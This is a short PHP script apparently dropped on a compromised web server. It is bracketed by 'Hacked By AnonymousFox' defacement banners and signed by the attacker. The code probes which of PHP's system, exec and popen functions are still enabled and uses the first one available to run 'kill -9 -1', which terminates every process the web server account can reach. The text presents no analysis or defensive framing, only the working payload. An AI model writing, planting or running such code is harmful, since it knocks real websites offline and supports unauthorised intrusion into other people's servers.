Hacked By AnonymousFox
<?php
// 杀进程
function kill($str){
$disabled = explode(',', ini_get('disable_functions'));
$new_disable = array();
foreach ($disabled as $item) {
$new_disable[] = trim($item);
}
if (!in_array('system', $new_disable)){
@system($str);
return true;
}
if (!in_array('exec', $new_disable)){
@exec($str);
return true;
}
if (!in_array('popen', $new_disable)){
@popen($str);
return true;
}
return false;
}
echo kill('kill -9 -1 > /dev/null 2>&1 ');
?>
Hacked By AnonymousFox1.0, Coded By AnonymousFox